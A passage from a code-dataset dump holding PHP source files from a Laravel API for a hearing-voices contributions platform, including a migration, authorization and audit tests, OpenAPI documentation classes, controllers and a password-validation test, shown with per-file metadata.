"num_lines": 32,
"path": "/database/migrations/2019_05_28_173719_create_contribution_tag_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionTagTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contribution_tag', function (Blueprint $table): void {\n $table->uuid('contribution_id');\n $table->foreign('contribution_id')->references('id')->on('contributions');\n $table->uuid('tag_id');\n $table->foreign('tag_id')->references('id')->on('tags');\n $table->primary(['contribution_id', 'tag_id']);\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contribution_tag');\n }\n}\n"
},
{
"alpha_fraction": 0.5823217034339905,
"alphanum_fraction": 0.585356593132019,
"avg_line_length": 29.298851013183594,
"blob_id": "56d419fb70a7e7a29b6d3bbd224c2dcc5e10cd64",
"content_id": "2037099173dd046e36248a263b1cac2c98bbeec0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5272,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 174,
"path": "/tests/Feature/V1/Contribution/ApproveControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\Contribution;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionApprovedSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass ApproveControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_approve(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_approve(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_public(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PUBLIC)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_private(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_changes_requested(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_approve_in_review(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_approve(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $contribution): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Approved contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_end_user_for_approve(): void\n {\n Queue::fake();\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail) use ($contribution): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === $contribution->endUser->user->email\n && $mail->getSubject() === Arr::get($emailContent, 'end_user.contribution_approved.subject')\n && $mail->getBody() === Arr::get($emailContent, 'end_user.contribution_approved.body')\n && $mail->getSubstituter() instanceof ContributionApprovedSubstituter;\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5914546251296997,
"alphanum_fraction": 0.5919346809387207,
"avg_line_length": 34.91379165649414,
"blob_id": "54921896cd0fd010656cdbb604209890b0c0ec8a",
"content_id": "6bb9ce9144c079eaadbbad237eb7d2204f5d8673",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2083,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 58,
"path": "/app/Docs/Operations/Contributions/RejectContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass RejectContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_PUT)\n ->summary('Reject a specific contribution')\n ->description(\n Utils::operationDescription(\n [Admin::class],\n 'This endpoint can only be invoked if the contribution is either public or in review.'\n )\n )\n ->tags(ContributionsTag::create())\n ->requestBody(\n RequestBody::create()->required()->content(\n MediaType::json()->schema(\n Schema::object()\n ->required('changes_requested')\n ->properties(\n Schema::string('changes_requested')\n )\n )\n )\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.647493839263916,
"alphanum_fraction": 0.6483155488967896,
"avg_line_length": 20.73214340209961,
"blob_id": "1427d6c626515691fa8e073a1dfbaade905681fd",
"content_id": "a5e9ffdc17db80e2093c9b26b2fa5a6b42196610",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1217,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 56,
"path": "/app/Models/Relationships/UserRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\FileToken;\nuse App\\Models\\Notification;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasOne;\n\ntrait UserRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function audits(): HasMany\n {\n return $this->hasMany(Audit::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function notifications(): HasMany\n {\n return $this->hasMany(Notification::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function fileToken(): HasMany\n {\n return $this->hasMany(FileToken::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasOne]\n */\n public function admin(): HasOne\n {\n return $this->hasOne(Admin::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasOne\n */\n public function endUser(): HasOne\n {\n return $this->hasOne(EndUser::class);\n }\n}\n"
},
{
"alpha_fraction": 0.6567656993865967,
"alphanum_fraction": 0.6600660085678101,
"avg_line_length": 15.833333015441895,
"blob_id": "8d32f19e6ec883c430720698f5a7a52bc99def25",
"content_id": "e581b74f6c1574b0a1434f1d955e99e466ca083e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 303,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 18,
"path": "/app/Http/Controllers/LandingController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse Illuminate\\Contracts\\View\\View;\n\nclass LandingController extends WebController\n{\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function __invoke(): View\n {\n return view('landing.index');\n }\n}\n"
},
{
"alpha_fraction": 0.5942744612693787,
"alphanum_fraction": 0.5952615737915039,
"avg_line_length": 21.021739959716797,
"blob_id": "e497ba0804d9e6363be7aa884b1565090f0db793",
"content_id": "8e8a8f25e542f7744d8e46616e991feb46ea93ca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1013,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 46,
"path": "/app/VariableSubstitution/Email/Admin/PasswordResetSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\Admin;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass PasswordResetSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\Admin\n */\n protected $admin;\n\n /**\n * @var string\n */\n protected $passwordResetUrl;\n\n /**\n * PasswordResetSubstituter constructor.\n *\n * @param \\App\\Models\\Admin $admin\n * @param string $passwordResetUrl\n */\n public function __construct(Admin $admin, string $passwordResetUrl)\n {\n $this->admin = $admin;\n $this->passwordResetUrl = $passwordResetUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'ADMIN_EMAIL' => $this->admin->user->email,\n 'ADMIN_NAME' => $this->admin->name,\n 'ADMIN_PHONE' => $this->admin->phone,\n 'PASSWORD_RESET_URL' => $this->passwordResetUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6025437116622925,
"alphanum_fraction": 0.6041335463523865,
"avg_line_length": 16.97142791748047,
"blob_id": "45eea8160308a70afe12d403a3fc0b7e8b96c8e8",
"content_id": "e302c4ec06343fcb913b361fe879812127a4bf2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 629,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 35,
"path": "/app/Policies/SettingPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass SettingPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list settings.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can update the settings.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function update(User $user): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.5715571641921997,
"alphanum_fraction": 0.5724572539329529,
"avg_line_length": 22.14583396911621,
"blob_id": "205ee62985c273f6842ef05b76fabaaaafe4a91c",
"content_id": "fa6605eb0a7032e06f1cc6e23de8906fc38f96a5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1111,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 48,
"path": "/tests/Unit/Rules/PasswordTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Rules\\Password;\nuse Tests\\TestCase;\n\nclass PasswordTest extends TestCase\n{\n /** @test */\n public function it_passes_strong_password(): void\n {\n $rule = new Password();\n\n $result = $rule->passes('test', '@bcd3fgH');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_weak_password(): void\n {\n $rule = new Password();\n\n $result = $rule->passes('test', 'secret');\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new Password();\n $specialCharacters = Password::ALLOWED_SPECIAL_CHARACTERS;\n\n $message = <<<EOT\n The :attribute must be at least eight characters long, \n contain one uppercase letter, \n one lowercase letter, \n one number and one special character ({$specialCharacters}).\n EOT;\n $message = str_replace(PHP_EOL, '', $message);\n\n $this->assertEquals($message, $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.7686062455177307,
"alphanum_fraction": 0.7726657390594482,
"avg_line_length": 31.130434036254883,
"blob_id": "78436a0e92c783972df0e1d27bc23aabaed85e61",
"content_id": "3ba10085182e09420da7c5994967becfd00cf435",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 739,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 23,
"path": "/app/Docs/SecurityRequirement.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Docs\\SecuritySchemes\\OAuth2SecurityScheme;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityRequirement as BaseSecurityRequirement;\n\nclass SecurityRequirement extends BaseSecurityRequirement\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityRequirement\n */\n public static function create(string $objectId = null): BaseObject\n {\n return BaseSecurityRequirement::create($objectId)\n ->securityScheme(OAuth2SecurityScheme::create());\n }\n}\n"
},
{
"alpha_fraction": 0.5998049378395081,
"alphanum_fraction": 0.6014304161071777,
"avg_line_length": 38.43589782714844,
"blob_id": "44e81f2a884ef36c5ba01a9d5c4e419f0dfd8efc",
"content_id": "b040f9d67183bf92e2d4c7c5f5b2e899f61b7841",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3076,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 78,
"path": "/app/Docs/OpenApi.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\OpenApi as BaseOpenApi;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Response;\n\nclass OpenApi extends BaseOpenApi implements Responsable\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return static\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->openapi(static::OPENAPI_3_0_2)\n ->info(Info::create())\n ->servers(Server::create())\n ->paths(\n Paths\\Admins\\AdminsRootPath::create(),\n Paths\\Admins\\AdminsMePath::create(),\n Paths\\Admins\\AdminsNestedPath::create(),\n Paths\\Audits\\AuditsRootPath::create(),\n Paths\\Audits\\AuditsNestedPath::create(),\n Paths\\Contributions\\ContributionsRootPath::create(),\n Paths\\Contributions\\ContributionsNestedPath::create(),\n Paths\\Contributions\\ContributionsApprovePath::create(),\n Paths\\Contributions\\ContributionsRejectPath::create(),\n Paths\\EndUsers\\EndUsersRootPath::create(),\n Paths\\EndUsers\\EndUsersMePath::create(),\n Paths\\EndUsers\\EndUsersNestedPath::create(),\n Paths\\Exports\\ExportsRequestPath::create(),\n Paths\\Files\\FilesRequestPath::create(),\n Paths\\Files\\FilesDownloadPath::create(),\n Paths\\Notifications\\NotificationsRootPath::create(),\n Paths\\Notifications\\NotificationsNestedPath::create(),\n Paths\\Settings\\SettingsRootPath::create(),\n Paths\\Tags\\TagsRootPath::create(),\n Paths\\Tags\\TagsNestedPath::create()\n )\n ->components(Components::create())\n ->security(SecurityRequirement::create())\n ->tags(\n Tags\\AdminsTag::create(),\n Tags\\AuditsTag::create(),\n Tags\\ContributionsTag::create(),\n Tags\\EndUsersTag::create(),\n Tags\\ExportsTag::create(),\n Tags\\FilesTag::create(),\n Tags\\NotificationsTag::create(),\n Tags\\SettingsTag::create(),\n Tags\\TagsTag::create()\n )\n ->externalDocs(ExternalDocs::create());\n }\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function toResponse($request): JsonResponse\n {\n return response()->json($this->toArray(), Response::HTTP_OK, [\n 'Content-Disposition' => 'inline; filename=\"openapi.json\"',\n 'Content-Type' => 'application/json; charset=utf-8',\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.6739130616188049,
"avg_line_length": 8.199999809265137,
"blob_id": "aa87f911d0a0cf2e299610caa55a31737ba17974",
"content_id": "7182a4c02ed9784efd7fa243aaa9b8f6fb79cadc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/AuditScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait AuditScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5269396305084229,
"alphanum_fraction": 0.5274784564971924,
"avg_line_length": 36.119998931884766,
"blob_id": "fcba85c01d243ec1e55b9c8cb9433dd4b0ef15c0",
"content_id": "81100f2930f6d3e52b5bb8530ecdfef9cdf937c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1856,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 50,
"path": "/app/Docs/Schemas/EndUser/EndUserSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\EndUser;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EndUserSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('email'),\n Schema::string('country')\n ->nullable(),\n Schema::integer('birth_year')\n ->nullable(),\n Schema::string('gender')\n ->nullable(),\n Schema::string('ethnicity')\n ->nullable(),\n Schema::integer('contributions_count'),\n Schema::integer('public_contributions_count'),\n Schema::integer('private_contributions_count'),\n Schema::integer('in_review_contributions_count'),\n Schema::integer('changes_requested_contributions_count'),\n Schema::string('gdpr_consented_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('email_verified_at')\n ->format(static::FORMAT_DATE_TIME)\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('deleted_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7116104960441589,
"alphanum_fraction": 0.7128589153289795,
"avg_line_length": 28.66666603088379,
"blob_id": "1d69d1d4434d4cf282d023707cd2c172b75ca17f",
"content_id": "8e4744096099d72be5700c83e1869d5f7ad94ec7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 801,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 27,
"path": "/app/Docs/Paths/Notifications/NotificationsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Notifications;\n\nuse App\\Docs\\Operations\\Notifications\\IndexNotificationOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass NotificationsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/notifications')\n ->operations(\n IndexNotificationOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7047772407531738,
"alphanum_fraction": 0.7058507800102234,
"avg_line_length": 31.6842098236084,
"blob_id": "246f2b90b0fbe1933742def5946b9b557caff865",
"content_id": "a25915c852b0e175416b82748e6679d849fcd474",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1863,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 57,
"path": "/app/Http/Controllers/V1/Contribution/RejectController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Contribution;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Contribution\\RejectContributionRequest;\nuse App\\Http\\Resources\\ContributionResource;\nuse App\\Models\\Contribution;\nuse App\\Services\\ContributionService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RejectController extends ApiController\n{\n /**\n * RejectController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\RejectContributionRequest $request\n * @param \\App\\Services\\ContributionService $contributionService\n * @param \\App\\Models\\Contribution $contribution\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(\n RejectContributionRequest $request,\n ContributionService $contributionService,\n Contribution $contribution\n ): JsonResource {\n $this->authorize('reject', $contribution);\n\n $contribution = DB::transaction(\n function () use ($request, $contributionService, $contribution): Contribution {\n return $contributionService->reject($contribution, $request->changes_requested);\n }\n );\n\n event(EndpointInvoked::onUpdate($request, \"Rejected contribution [{$contribution->id}].\"));\n\n return new ContributionResource($contribution);\n }\n}\n"
},
{
"alpha_fraction": 0.5317381024360657,
"alphanum_fraction": 0.539049506187439,
"avg_line_length": 24.939655303955078,
"blob_id": "2755424edb1cb0b0fbc776dc44080d4715dc2892",
"content_id": "ce270f757b7cb33e674199704eef672ae1b7a3d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3009,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 116,
"path": "/tests/Feature/V1/Admin/MeControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\Admin;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass MeControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_invoke(): void\n {\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertResourceDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertJsonFragment([\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n 'created_at' => $admin->user->created_at->toIso8601String(),\n 'updated_at' => $admin->user->updated_at->toIso8601String(),\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_invoke(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $this->getJson('/v1/admins/me');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin): bool {\n return $event->getUser()->is($admin->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5631141066551208,
"alphanum_fraction": 0.5653817057609558,
"avg_line_length": 21.049999237060547,
"blob_id": "0dd9559b7ef4792fc7dc362e95d818a9a1a899fb",
"content_id": "f49d58a8367c0809fa70814a89ee50813b804661",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 60,
"path": "/tests/Unit/Support/MarkdownTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
